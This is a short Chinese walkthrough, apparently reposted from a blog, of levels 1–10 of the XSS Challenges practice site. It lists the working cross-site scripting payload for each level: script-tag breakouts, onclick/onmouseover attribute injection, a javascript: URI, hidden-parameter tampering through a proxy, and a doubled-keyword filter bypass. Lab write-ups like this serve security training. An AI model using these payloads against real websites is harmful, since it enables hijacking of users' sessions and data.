XSS Challenges练习方法
Posted 慕書
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS Challenges练习方法相关的知识,希望对你有一定的参考价值。
XSS Challenges练习方法
网站练习地址:https://xss-quiz.int21h.jp/
第一关
- 输入 123,查看到渗透点
- 输入:
"</b><script>alert(document.domain);</script>
,结果成功
第二关
- 输入:123
- 输入:
"><script>alert(document.domain);</script>
第三关
- 输入:123,再输入:
</b><script>alert(document.domain);</script>
- 使用抓包软件,BP,更改P2参数为:
<script>alert(document.domain);</script>
- 成功进行XSS
第四关
- 抓包看见三个参数,输入一些XSS发现无情况,但发现有三个参数:
p1=123&p2=Japan&p3=hackme
- 找到 p3的参数
- 发现隐藏的参数P3容易进行XSS,改变p3的参数,输入如下:">
<script>alert(document.domain);</script>
第五关
- 输入:123,发现框框的参数有输入限制,可进行更改,直接更改。
- 输入:
"><script>alert(document.domain);</script>
第六关
-
输入:
"><script>alert(document.domain);</script>
,发现被转义了
-
两种方法
输入:"onclick="alert(document.domain)
输入:"onmouseover="alert(document.domain)
第七关
- 输入:
test onmouseover=alert(document.domain)
或者test onclick=alert(document.domain)
第八关
- 记住一句话,a标签用下面这个,输入:
javascript:alert(document.domain)
第九关
- 这个关卡,其他网友给得意见是使用IE浏览器,对环境有要求,先跳过,后台使用:
alert(document.domain);
可以直接跳过
第十关
- 输入:
" onclick="alert(document.dodomainmain)
以上是关于XSS Challenges练习方法的主要内容,如果未能解决你的问题,请参考以下文章